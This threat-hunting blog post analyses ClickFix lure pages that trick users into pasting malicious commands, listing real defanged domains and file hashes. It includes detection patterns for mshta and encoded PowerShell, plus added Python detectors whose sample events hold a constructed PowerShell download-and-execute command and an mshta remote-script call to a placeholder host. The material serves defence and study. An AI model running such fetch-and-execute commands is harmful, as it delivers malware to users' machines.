Identifying ClickFix Exploits: A Case Study in Proactive Threat Hunting
Published on Apr 3, 2025

ClickFix is a browser-based delivery technique that uses deceptive prompts and clipboard hijacking to trick users into executing malicious commands. Often disguised as system alerts or CAPTCHA challenges, these web pages lure users into clicking a button, at which point a payload is silently staged for execution.
Both cybercriminals and advanced actors have adopted this technique to deploy a range of malware, most commonly information stealers delivered via mshta.exe, PowerShell, or embedded JavaScript.
Our research team used HuntSQL™ to proactively identify web infrastructure exhibiting traits associated with ClickFix delivery. Drawing from behavioral patterns observed in earlier reporting, we developed a custom query to track similar activity at scale across Hunt.io's dataset, ultimately uncovering multiple live domains serving malicious content yet to be publicly reported.
In the following sections, we break down the ClickFix technique, highlight real-world examples that surfaced as a result of our query, and examine how attackers are actively employing this method across the web.
Understanding the ClickFix Flow
In mid-2024, ClickFix emerged as a deceptive execution method that abused familiar UI elements to trick users into running malware under the guise of legitimate system prompts.
These lures often appear as 'Fix Now' and 'Bot Verification' messages, typically triggered by a click or JavaScript page load event.
Below is a breakdown of how the infection occurs:
Step 1: The user is instructed to press Windows + R, which opens the native Run dialog on Windows.
Step 2: Next, the site tells the user to press Ctrl + V, pasting a preloaded command silently copied to the clipboard via JavaScript.
Step 3: Pressing Enter executes the payload. Depending on the variant, it often launches mshta.exe to retrieve and run a remote script or invokes PowerShell directly.
The entire interaction with the user is framed as a necessary system action, something we all encounter daily while surfing the internet.
Building Search Queries in Hunt.io
Hunt's approach to identifying ClickFix delivery domains centered on translating observable behaviors into structured, repeatable queries. Drawing on public reporting from Sekoia, Microsoft, and Proofpoint, we reviewed known webpages hosting the exploit and extracted a small set of recurring strings found in HTML and JavaScript used to stage payloads:
- 'Robot or Human'
- 'mshta'
- 'I am not a robot'

The three examples above represent a small, targeted set used for this blog. Defenders looking to start hunting immediately can expand on this approach by incorporating additional patterns such as 'Try Fix', 'reCAPTCHA Verification Id:', and 'powershell -enc'.
Users can adapt and experiment with different queries in HuntSQL™ to search across IPs, URLs, and hostnames through the SQL API or within the Crawler tab.
For this post, we've limited our results to scans with a timestamp of March 26th or later, capturing the most recent domains matching ClickFix activity.
Below is the query we came up with:
```sql
SELECT timestamp, ip, url, body
FROM crawler
WHERE timestamp.day gt '2025-03-26'
AND (
  body LIKE '%Robot or Human%'
  OR body LIKE '%mshta%'
  OR body LIKE '%I am not a robot%'
)
GROUP BY timestamp, ip, url, body
```
Running the query across Hunt's Crawler dataset returned 10 results that matched the string patterns we identified earlier.
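To make the hunting logic above reproducible outside HuntSQL™, here is an added example (not Hunt.io's code, and not the query the post ran) that applies the same string patterns, plus the expansions suggested earlier, to a few constructed crawler records. It also annotates each hit with two traits that the later case studies rely on: a JavaScript clipboard write, which any ClickFix page needs in order to stage its command, and a hardcoded Telegram bot token of the kind found on the Zoho credential page. The records, IP addresses and hostnames (`*.example`) are constructed; the `CrawlRecord` type and `hunt()` function are assumptions of this example.

```python
"""Added example (not Hunt.io code): re-implement the post's HuntSQL hunt over a
handful of constructed crawler records, then enrich each hit with two traits a
ClickFix page tends to carry: a JavaScript clipboard write and, for the
credential-theft variant, a hardcoded Telegram bot token."""
import re
from dataclasses import dataclass
from datetime import date

# The three strings from the post's query plus the expansions it suggests.
LURE_PATTERNS = [
    "Robot or Human", "mshta", "I am not a robot",
    "Try Fix", "reCAPTCHA Verification Id:", "powershell -enc",
]
# Browser APIs a page must call to stage a command in the clipboard.
CLIPBOARD_RE = re.compile(
    r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)
# Shape of a Telegram Bot API URL with an embedded token (digits:secret).
TG_TOKEN_RE = re.compile(r"api\.telegram\.org/bot\d{8,10}:[A-Za-z0-9_-]{30,}")


@dataclass
class CrawlRecord:
    timestamp: date   # day the body was captured
    ip: str
    url: str
    body: str         # raw HTML as crawled


def hunt(records, since=date(2025, 3, 26)):
    """Mirror the query's WHERE clause: keep records captured after `since`
    whose body contains at least one lure string (matched case-insensitively,
    a deliberate broadening of the SQL LIKE), and annotate each hit."""
    hits = []
    for r in records:
        if r.timestamp <= since:           # timestamp.day gt '2025-03-26'
            continue
        lower = r.body.lower()
        matched = [p for p in LURE_PATTERNS if p.lower() in lower]
        if not matched:
            continue
        hits.append({
            "url": r.url,
            "ip": r.ip,
            "patterns": matched,
            "clipboard_write": CLIPBOARD_RE.search(r.body) is not None,
            "telegram_token": TG_TOKEN_RE.search(r.body) is not None,
        })
    return hits


# Constructed sample records; the hostnames are reserved example names.
SAMPLE_RECORDS = [
    CrawlRecord(date(2025, 3, 28), "192.0.2.10", "http://lure.example/verify.html",
                '<h2>Robot or Human?</h2>'
                '<button onclick="navigator.clipboard.writeText(cmd)">Verify</button>'),
    CrawlRecord(date(2025, 3, 27), "192.0.2.11", "http://mail.example/login.html",
                '<title>Webmail Sign-in</title><label>I am not a robot</label>'
                '<script>fetch("https://api.telegram.org/bot123456789:'
                'AAExampleConstructedTokenValue_0123456789/sendMessage")</script>'),
    CrawlRecord(date(2025, 3, 20), "192.0.2.12", "http://old.example/",
                '<p>Try Fix</p>'),                       # before the cutoff
    CrawlRecord(date(2025, 3, 29), "192.0.2.13", "http://shop.example/",
                '<p>Welcome to our store</p>'),          # no lure strings
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_RECORDS):
        print(h)
```

Matching case-insensitively and keeping the full list of patterns that fired makes triage easier than a bare `LIKE` hit: a page that combines a lure string with a clipboard write is a much stronger candidate than one that merely mentions "mshta" in a blog post, and the token check separates the credential-theft variant from the malware-delivery ones.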
Looking at the domains in Figure 1, we see references to Microsoft 365, 'coins' (likely a reference to digital currencies), and another seeming to abuse Scaleway's Object storage service at s3.pl-waw[.]scw[.]cloud.
In the next section, we'll take a closer look at several of these web pages and the techniques used to deceive users and infect their systems.
Observed ClickFix Pages
Bitcoin-Themed Domain Poses as Cloudflare WAF to Deliver Lumma, CryptBot
The first site uncovered in our query, soubtcevent[.]com, presents a typical CAPTCHA-style verification page prompting users to prove they are not a robot. After clicking the button, a secondary prompt appears, mimicking a Cloudflare Web Application Firewall (WAF) check, asking the user to manually enter the word 'Cloudflare' into a system dialog box.
Once the string is entered, a Base64-encoded PowerShell script is run. Decoding the string reveals a second script hosted at tlgrm-redirect[.]icu/1.txt.
The second-stage code downloads three ZIP archives (1.zip, 2.zip, 3.zip) from mikropedik[.]in, and logs the success or failure of each attempt to tlgrmverif[.]cyou/log.php. When extracted:

- 1.zip and 2.zip each contain Windows Portable Executables: verify1.exe and verify2.exe.
- 3.zip includes verify3.exe alongside several DLLs.
At the time of analysis, verify1.exe was flagged as malicious by 39 of 73 vendors on VirusTotal. User comments suggest an association with the Lumma Stealer malware, and network activity includes callbacks to targett[.]top, a Telegram bot API endpoint, and meltmetu[.]live.
The malware also communicated with a Steam community profile page, likely to obtain URL paths for further infection of the target.
verify2.exe follows a similar network pattern, initiating communication with 94.181.203[.]38:4057/15bff393f6b17fef247/wwqkigwk.87r61. The endpoint closely mirrors the aforementioned Steam user profiles in Figure 4. The two files differ in that this executable was linked to CryptBot malware.
As of the time of writing, verify3.exe returned a score of 0 and had no comments indicating it was connected to a malware family.
On Mar 18, 2025, soubtcevent[.]com was promoted on X by a Japanese-language account associated with a cryptocurrency project named SOU BTC.
Translated from Japanese to English, the text of the March 18th post reads:
"Are you confident the market will bounce back quickly?
If you don't want to miss out on my top 100x chances, consider joining my private group.
Open for 1 hour. Best of luck."
It remains unclear whether the domain was compromised or if the individual promoting it is part of a cryptocurrency scam infecting users with information stealer malware. Regardless, users and defenders should be observant of prompts pretending to be associated with web application firewall software.
ClickFix Page Targets Zoho Office Suite Credentials
Unlike other attacks involving malware delivery, this example focuses on credential theft. The domain, timestesol[.]com, has the title 'Webmail Sign-in' and prompts for verification using the phrase 'I am not a robot,' which, if you remember, was one of our HuntSQL™ query keywords.
After interacting with the verification button, users are redirected to a login prompt branded with the Zoho header and a message indicating their session has expired, urging them to re-enter their username/password to continue.
Reviewing the webpage's source code reveals a hardcoded Telegram bot token, suggesting that once the users' email and password are entered, they are sent directly to an actor-controlled endpoint.
Rather than relying on malware execution, this variant leverages ClickFix tactics to guide users into submitting credentials, an arguably more discreet approach. As awareness of clipboard-based delivery increases, phishing adaptations like this may offer a lower-friction path for threat actors targeting enterprise platforms.
Compromised Website Abused to Deliver PowerShell
Our final example involves using compromised infrastructure to deliver a fileless PowerShell payload.
Clicking the verification prompt at https[:]//riverview-pools[.]com/verify/index.html copies a PowerShell command to the user's clipboard.

Visiting the script at http[:]//aatox[.]com/verify/45.ps1 reveals a Base64-encoded command that, once decoded, attempts to retrieve a second script (44.ps1) from a London-based website, which was likely compromised. As of this writing, the URL was inactive, suggesting the intrusion may have been remediated.
Together, these examples show how the ClickFix technique can be adapted for malware delivery, credential theft, and covert payload staging, often without relying on dedicated attacker infrastructure.
Final thoughts
ClickFix continues to gain traction as a low-friction method for delivering malware and harvesting credentials through deceptive browser-based prompts. By staging payloads in the clipboard and leaning on user interaction, it bypasses traditional download workflows and challenges conventional detection strategies.
In this post, we outlined how ClickFix is being used across a range of web-based delivery mechanisms, from clipboard-injected malware to credential harvesting and fileless payload staging. By focusing on the behavioral patterns of these pages, we were able to surface active infrastructure that may otherwise evade traditional detection pipelines.
Defender Recommendations
To reduce exposure to ClickFix-style delivery mechanisms, defenders should consider the following:

- Monitor for clipboard-based execution involving PowerShell, mshta.exe, or Base64-encoded commands, especially when preceded by suspicious browser activity.
- Alert on or block access to domains hosting verification-style lures that mimic CAPTCHA challenges or security checks.
- Ensure endpoint detection tools are deployed and configured to log PowerShell activity, script-based execution, and unusual clipboard use.
- Encourage users to enroll in multi-factor authentication (MFA) to mitigate the impact of potential credential harvesting campaigns.
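The first and third recommendations come down to one endpoint detection: a Run-dialog launch of mshta.exe or PowerShell, frequently carrying a Base64 `-EncodedCommand`, as in the soubtcevent[.]com and riverview-pools[.]com cases. The following added example (not Hunt.io's code and not a rule from any product) scores constructed process-creation events for that chain and decodes the encoded argument so the staged URL is visible to the analyst instead of hidden in Base64. The events, the `example.invalid` hostname and the `assess()` scoring are constructed for this example; the event field names (image, parent_image, command_line) are an assumption and would map onto Sysmon Event ID 1 or Windows 4688 fields in practice.

```python
"""Added example (not Hunt.io code): score constructed Windows process-creation
events for the execution chain the post describes (Run dialog -> mshta.exe or
PowerShell, often with a Base64 -EncodedCommand) and decode the encoded blob so
the staged URL is visible to the analyst."""
import base64
import re

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe"}
# -EncodedCommand and the abbreviations PowerShell accepts, followed by Base64.
ENC_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand text (Base64 of UTF-16LE) or None."""
    m = ENC_FLAG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def assess(event):
    """Score one event dict (image, parent_image, command_line) and return the
    reasons and any URLs found in the raw or decoded command line."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    reasons, urls = [], []
    if image not in LOLBINS:
        return {"score": 0, "reasons": reasons, "urls": urls}
    if parent == "explorer.exe":
        # Win+R runs the pasted command as a child of explorer.exe.
        reasons.append("launched from explorer.exe (consistent with the Run dialog)")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("Base64 -EncodedCommand argument")
    for text in (cmd, decoded or ""):
        urls.extend(URL_RE.findall(text))
    if urls:
        reasons.append("remote URL in raw or decoded command line")
    return {"score": len(reasons), "reasons": reasons, "urls": urls}


def _enc(script):
    """Build an -EncodedCommand value for the constructed samples below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events; example.invalid is a reserved, non-resolving name.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -w hidden -enc " + _enc(
         "Invoke-WebRequest 'http://example.invalid/44.ps1' | Invoke-Expression")},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta.exe http://example.invalid/verify.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -NoProfile -File .\build.ps1"},  # routine admin use
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["image"].rsplit("\\", 1)[-1], assess(e))
```

The score is deliberately additive rather than a single string match: an explorer.exe parent alone is common, and an encoded command alone is common in legitimate automation, but the two together with a URL in the decoded text is the shape of the chain described in this post. Decoding the argument in the rule, rather than alerting on the opaque Base64, also gives the responder the second-stage URL to block without a manual decode step.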
ClickFix Network Observables and Indicators of Compromise (IOCs)
Domain | IP Address | ASN (Organization) | Country |
---|---|---|---|
soubtcevent[.]com | 94.181.229[.]250 | JSC ER-Telecom Holding | RU |
informepartne[.]com | 104.21.60[.]15 | Cloudflare | US |
securedmicrosoft365[.]com | 20.217.17[.]201 | Microsoft | IL |
movmlyvvip88[.]xyz | 172.67.135[.]234 | Cloudflare | US |
staticpage-dispatch.s3.pl-waw.scw[.]cloud/device-sync.html | 151.115.10[.]3 | Scaleway S.a.s. | PL |
informationhuman[.]com | 104.21.48[.]1 | Cloudflare | US |
coinspaceteam[.]com | 94.181.229[.]250 | JSC ER-Telecom Holding | RU |
informboomk[.]com | 104.21.16[.]1 | Cloudflare | US |
tlgrmverif[.]cyou | 94.181.229[.]250 | JSC ER-Telecom Holding | RU |
micropedik[.]in | 94.181.229[.]250 | JSC ER-Telecom Holding | RU |
targett[.]top | 104.16.198[.]133 | Cloudflare | US |
ClickFix Host Observables and Indicators of Compromise (IOCs)
Filename | SHA-256 |
---|---|
1.zip | 1d4f24b5df63fb65947d1d1378b9686986a78bd4dc714511358bf0fea841bc51 |
verify1.exe | dad4ecd247efa876faac2e3f67130951b044043ca21c5db6281ba2b8fce7a089 |
2.zip | 638a472c16202c2b564a08b779b6640bcc933ba170d469370f83645130fa76b5 |
verify2.exe | 69c513f0ddf4416e0d47f778594fd76b96424359c7e9c2e5585ad0abaaf5dbc0 |
3.zip | 85fc09ce98fb126d4d47d4b75a96fb7e7ca6184bfcb9971cfae8d893f2912cf1 |
verify3.exe | e11d68ee9294a55de8548687935567d030dae3a594d40ea75f88598f30ebb76e |
focus-beats-vol1.mp3 | 4f568e8305ea8a024c22b0b77547384950198156fb4217c0278e09bed17a144c |
1.txt | 909ed8a1351f9a21ebdd5d8efb4147145f12d5d24225dbd44cd2800a1f94a596 |
Hunt Intelligence, Inc.